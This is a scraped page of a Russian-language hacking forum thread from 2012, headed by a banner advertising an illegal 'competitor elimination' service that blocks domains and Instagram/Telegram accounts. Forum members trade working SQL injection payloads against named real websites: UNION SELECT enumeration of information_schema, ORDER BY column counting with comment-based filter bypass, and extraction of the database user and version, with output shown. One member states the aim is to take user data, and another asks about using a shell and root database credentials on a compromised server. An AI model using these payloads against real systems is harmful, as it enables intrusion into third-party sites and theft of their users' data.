УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1959 из 2438

1959

Опции темы

Поиск в этой теме

Опции просмотра

#19581

09.02.2012, 13:22

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от ivan151

ivan151 said:
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля

select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a, 0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)

где 666 - кол-во строк не более максимального значения в таблице.

#19582

09.02.2012, 14:51

smirk

Guest

Сообщений: n/a

Провел на форуме:
45774

Репутация: 26

Цитата:

Сообщение от ivan151

ivan151 said:
вобщем вот сайт http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,5--
всего для вывода 2 поля,ну допустим юзаю лимит и таким запросом http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,table_name+from+information _schema.tables+limit+0,1 пытаюсь узнать имена таблиц(мне нужны данные пользователей) и меняя лимит выводит другие таблицы вот например там есть:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
answer
но в какой таблице данные пользователей и как их вытащить? и ещё можно ли тут использовать ' UNION SELECT TOP 1 login FROM users-- и если да то как это должно выглядеть?

может лучше почитать мануал?

там все популярно расписано...

#19583

09.02.2012, 17:46

anonym_di

Guest

Сообщений: n/a

Провел на форуме:
11684

Репутация: 0

Всем Хай, вот есть сайт

http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???

#19584

09.02.2012, 18:32

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

Цитата:

Сообщение от anonym_di

anonym_di said:
Всем Хай, вот есть сайт
http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???

http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно

#19585

09.02.2012, 18:46

anonym_di

Guest

Сообщений: n/a

Провел на форуме:
11684

Репутация: 0

Цитата:

Сообщение от pirat0

pirat0 said:
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно

как ты узнал кол-во табл??

#19586

09.02.2012, 18:50

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Смотри, там у тебя два запроса.

http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true

http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false

http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true

Соответственно, кол-во = 26.

#19587

09.02.2012, 18:58

Always

Guest

Сообщений: n/a

Провел на форуме:
17560

Репутация: 0

Цитата:

Сообщение от anonym_di

anonym_di said:
как ты узнал кол-во табл??

Цитата:

Сообщение от Ereee

Ereee said:
Смотри, там у тебя два запроса.
http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true
http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false
http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true
Соответственно, кол-во = 26.

амне показалось фильтрация идет

http://www.lingvoinfo.com/?link=115/**/order/**/by/**/26+--+ true

http://www.lingvoinfo.com/?link=115/**/order/**/by/**/27+--+ false

#19588

09.02.2012, 19:06

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Помогите со скулёй, чёт никак не выходит

Цитата:

Сообщение от None

http://www.porsche-spb.ru/model.phtml?id=13

#19589

09.02.2012, 19:09

aydin-ka

Новичок

Регистрация: 03.05.2009

Сообщений: 7

Провел на форуме:
102906

Репутация: -14

Цитата:

Сообщение от qaz

qaz said:
Помогите со скулёй, чёт никак не выходит

Код:

Code:
http://www.porsche-spb.ru/model.phtml?id=9999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+

porsche_main@localhostorsche_main:5.5.19

Вроде все стандартно...

#19590

09.02.2012, 19:43

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

граждане, вопрос такой, есть шелл, нашол root конфиг бд пароль и логин, коннектился root-ом к базе пару недель назад все гуд, а сейчас пишет Access denied for user 'root'@'localhost' (using password: YES), думал пароль сменили, проверил - нет, таже связка логина и пароля, вопрос - в чем прикол??

p.s. если конекчюсь не рутом, все норм, коннект происходит

Страница 1959 из 2438

1959

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход